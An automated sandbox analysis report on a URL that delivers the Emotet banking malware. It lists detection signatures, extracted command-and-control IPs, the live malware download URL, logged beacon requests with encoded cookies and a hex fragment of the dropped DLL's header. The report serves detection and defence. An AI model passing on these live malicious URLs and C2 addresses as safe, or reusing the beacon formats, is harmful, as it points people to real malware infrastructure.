Windows Analysis Report
http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Overview

General Information

Sample URL: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV
Analysis ID: 670809
Infos:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
DLL side loading technique detected
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV Virustotal: Detection: 17% Perma Link
Antivirus / Scanner detection for submitted sample
Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV Avira URL Cloud: detection malicious, Label: malware
Antivirus detection for URL or domain
Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8 Avira URL Cloud: Label: malware
Source: https://213.239.212.5/ Avira URL Cloud: Label: malware
Source: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/ Avira URL Cloud: Label: malware
Source: https://213.239.212.5/D Avira URL Cloud: Label: malware
Source: https://45.55.191.130/%I: Avira URL Cloud: Label: malware
Source: https://45.55.191.130/; Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Desktop\download\NjszMzh0ar.dll ReversingLabs: Detection: 84%
Source: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy) ReversingLabs: Detection: 84%
Source: 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["232.3.0.0:1", "112.194.0.0:443", "96.92.0.0:127", "68.211.2.0:5008", "208.100.90.0:1", "16.101.90.0:1", "56.211.2.0:4684", "4.1.0.0:92", "236.3.0.0:1", "67.211.2.0:4684", "80.100.90.0:1", "70.211.2.0:2752", "16.100.90.0:1", "192.3.0.0:1", "4.4.0.0:1", "72.211.2.0:2264", "208.109.90.0:1", "20.4.0.0:1", "32.4.0.0:1", "16.4.0.0:1", "36.4.0.0:1", "222.94.0.0:16", "74.211.2.0:3964", "208.99.90.0:1", "215.219.2.0:2976"]}
Source: unknown HTTPS traffic detected: 45.55.191.130:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 213.239.212.5:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032754 FindFirstFileExW, 5_2_0000000180032754
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032C30 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180032C30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FEDC FindNextFileW,FindFirstFileW, 8_2_0049FEDC

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.55.191.130 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 213.239.212.5 443 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49776 -> 45.55.191.130:443
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.6:49779 -> 213.239.212.5:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 232.3.0.0:1
Source: Malware configuration extractor IPs: 112.194.0.0:443
Source: Malware configuration extractor IPs: 96.92.0.0:127
Source: Malware configuration extractor IPs: 68.211.2.0:5008
Source: Malware configuration extractor IPs: 208.100.90.0:1
Source: Malware configuration extractor IPs: 16.101.90.0:1
Source: Malware configuration extractor IPs: 56.211.2.0:4684
Source: Malware configuration extractor IPs: 4.1.0.0:92
Source: Malware configuration extractor IPs: 236.3.0.0:1
Source: Malware configuration extractor IPs: 67.211.2.0:4684
Source: Malware configuration extractor IPs: 80.100.90.0:1
Source: Malware configuration extractor IPs: 70.211.2.0:2752
Source: Malware configuration extractor IPs: 16.100.90.0:1
Source: Malware configuration extractor IPs: 192.3.0.0:1
Source: Malware configuration extractor IPs: 4.4.0.0:1
Source: Malware configuration extractor IPs: 72.211.2.0:2264
Source: Malware configuration extractor IPs: 208.109.90.0:1
Source: Malware configuration extractor IPs: 20.4.0.0:1
Source: Malware configuration extractor IPs: 32.4.0.0:1
Source: Malware configuration extractor IPs: 16.4.0.0:1
Source: Malware configuration extractor IPs: 36.4.0.0:1
Source: Malware configuration extractor IPs: 222.94.0.0:16
Source: Malware configuration extractor IPs: 74.211.2.0:3964
Source: Malware configuration extractor IPs: 208.99.90.0:1
Source: Malware configuration extractor IPs: 215.219.2.0:2976
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Cookie: m=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LZCx/zQGKWgzRZHDLgYA/eadm3uChEGtZAfPA0qXyIszplE5IkrOn/txpR2z567gQP5LblgXMN6wyYF1qhfvHost: 45.55.191.130Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Cookie: uhKAecyPEAU=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LQCQuyoXtQODjw6FmSNeA1Xr3LcEyw==Host: 213.239.212.5Connection: Keep-AliveCache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Jul 2022 04:51:53 GMTServer: Apache/2.2.15 (CentOS)Set-Cookie: 62d8db698429b=1658379113; expires=Thu, 21-Jul-2022 04:52:53 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 21 Jul 2022 04:51:53 GMTExpires: Thu, 21 Jul 2022 04:51:53 GMTContent-Disposition: attachment; filename="NjszMzh0ar.dll"Content-Transfer-Encoding: binaryContent-Length: 574464Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ef 34 f3 b7 ab 55 9d e4 ab 55 9d e4 ab 55 9d e4 78 27 9e e5 a7 55 9d e4 78 27 98 e5 2e 55 9d e4 78 27 99 e5 a7 55 9d e4 f9 20 98 e5 b4 55 9d e4 f9 20 99 e5 a5 55 9d e4 f9 20 9e e5 a2 55 9d e4 78 27 9c e5 ac 55 9d e4 ab 55 9c e4 d8 55 9d e4 6a 20 94 e5 af 55 9d e4 6a 20 9d e5 aa 55 9d e4 6a 20 62 e4 aa 55 9d e4 ab 55 0a e4 aa 55 9d e4 6a 20 9f e5 aa 55 9d e4 52 69 63 68 ab 55 9d e4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 33 62 bb 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 f2 04 00 00 ea 03 00 00 00 00 00 f0 19 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 09 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 f0 05 00 ac 03 00 00 9c f4 05 00 50 00 00 00 00 90 06 00 b8 86 02 00 00 40 06 00 7c 38 00 00 00 00 00 00 00 00 00 00 00 20 09 00 0c 08 00 00 60 c1 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c1 05 00 38 01 00 00 00 00 00 00 00 00 00 00 00 10 05 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e5 f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 f0 00 00 00 10 05 00 00 f2 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 28 00 00 00 10 06 00 00 0e 00 00 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 38 00 00 00 40 06 00 00 3a 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 80 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b8 86 02 00 00 90 06 00 00 88 02 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 08 00 00 00 20 09 00 00 0a 00 00 00 ba 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Jul 2022 04:52:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 45.55.191.130
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: unknown TCP traffic detected without corresponding DNS query: 213.239.212.5
Source: wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr String found in binary or memory: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/
Source: wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8
Source: regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467124834.0000000000607000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649755496.0000000000639000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://213.239.212.5/
Source: regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://213.239.212.5/D
Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.55.191.130/
Source: regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467241295.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649762809.000000000063F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471509754.000000000063D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.55.191.130/%I:
Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.55.191.130/;
Source: unknown DNS traffic detected: queries for: clotizen.dothome.co.kr
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6628 InternetReadFile, 8_2_004A6628
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Cookie: m=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LZCx/zQGKWgzRZHDLgYA/eadm3uChEGtZAfPA0qXyIszplE5IkrOn/txpR2z567gQP5LblgXMN6wyYF1qhfvHost: 45.55.191.130Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Cookie: uhKAecyPEAU=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LQCQuyoXtQODjw6FmSNeA1Xr3LcEyw==Host: 213.239.212.5Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /members/lZTkIb3OkjcV/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: clotizen.dothome.co.krConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 45.55.191.130:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 213.239.212.5:443 -> 192.168.2.6:49779 version: TLS 1.2

E-Banking Fraud
barindex
Source: Yara match File source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Emotet
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Deletes files inside the Windows folder
Source: C:\Windows\System32\regsvr32.exe File deleted: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll:Zone.Identifier Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\QKXGFEEVVr\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180030008 5_2_0000000180030008
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014084 5_2_0000000180014084
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180034D6C 5_2_0000000180034D6C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001A100 5_2_000000018001A100
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001E11C 5_2_000000018001E11C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180028140 5_2_0000000180028140
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016144 5_2_0000000180016144
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003A160 5_2_000000018003A160
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001418C 5_2_000000018001418C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180019228 5_2_0000000180019228
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003B29C 5_2_000000018003B29C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800142A8 5_2_00000001800142A8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001F310 5_2_000000018001F310
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001632C 5_2_000000018001632C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180045360 5_2_0000000180045360
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800143AC 5_2_00000001800143AC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800144C8 5_2_00000001800144C8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001D4D0 5_2_000000018001D4D0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001E500 5_2_000000018001E500
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001A50C 5_2_000000018001A50C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016558 5_2_0000000180016558
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002D574 5_2_000000018002D574
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800195BC 5_2_00000001800195BC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800145D0 5_2_00000001800145D0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003C60C 5_2_000000018003C60C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000864C 5_2_000000018000864C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003A690 5_2_000000018003A690
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800136D4 5_2_00000001800136D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800146EC 5_2_00000001800146EC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016744 5_2_0000000180016744
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032754 5_2_0000000180032754
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180027790 5_2_0000000180027790
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800367C4 5_2_00000001800367C4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800137DC 5_2_00000001800137DC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800147F4 5_2_00000001800147F4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003F808 5_2_000000018003F808
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800138FC 5_2_00000001800138FC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001D904 5_2_000000018001D904
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180015914 5_2_0000000180015914
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014914 5_2_0000000180014914
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002C964 5_2_000000018002C964
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016974 5_2_0000000180016974
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001E9D0 5_2_000000018001E9D0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800199E4 5_2_00000001800199E4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013A04 5_2_0000000180013A04
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014A1C 5_2_0000000180014A1C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180015AFC 5_2_0000000180015AFC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013B20 5_2_0000000180013B20
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014B24 5_2_0000000180014B24
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003AB40 5_2_000000018003AB40
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016B5C 5_2_0000000180016B5C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001BBC8 5_2_000000018001BBC8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180043BCC 5_2_0000000180043BCC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013C28 5_2_0000000180013C28
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180014C2C 5_2_0000000180014C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001BD1C 5_2_000000018001BD1C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180015D28 5_2_0000000180015D28
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013D48 5_2_0000000180013D48
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001DD50 5_2_000000018001DD50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180034D6C 5_2_0000000180034D6C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180019D70 5_2_0000000180019D70
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016D88 5_2_0000000180016D88
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018002CE14 5_2_000000018002CE14
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013E60 5_2_0000000180013E60
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180038E9C 5_2_0000000180038E9C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001EEB4 5_2_000000018001EEB4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180015F14 5_2_0000000180015F14
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013F68 5_2_0000000180013F68
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180016F74 5_2_0000000180016F74
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003DFDC 5_2_000000018003DFDC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_012B0000 5_2_012B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E409C 5_2_014E409C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E7368 5_2_014E7368
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E3320 5_2_014E3320
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EA38C 5_2_014EA38C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D7BB8 5_2_014D7BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DBA00 5_2_014DBA00
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E25B4 5_2_014E25B4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E5C94 5_2_014E5C94
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D4F80 5_2_014D4F80
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E7E54 5_2_014E7E54
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D7E74 5_2_014D7E74
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EB95C 5_2_014EB95C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EE964 5_2_014EE964
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EF108 5_2_014EF108
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D5914 5_2_014D5914
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D1910 5_2_014D1910
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EC9D8 5_2_014EC9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D39D4 5_2_014D39D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F21FC 5_2_014F21FC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F4180 5_2_014F4180
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E11AC 5_2_014E11AC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F31A4 5_2_014F31A4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F71A0 5_2_014F71A0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F087C 5_2_014F087C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DB078 5_2_014DB078
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F3078 5_2_014F3078
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014E7870 5_2_014E7870
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014D383C 5_2_014D383C
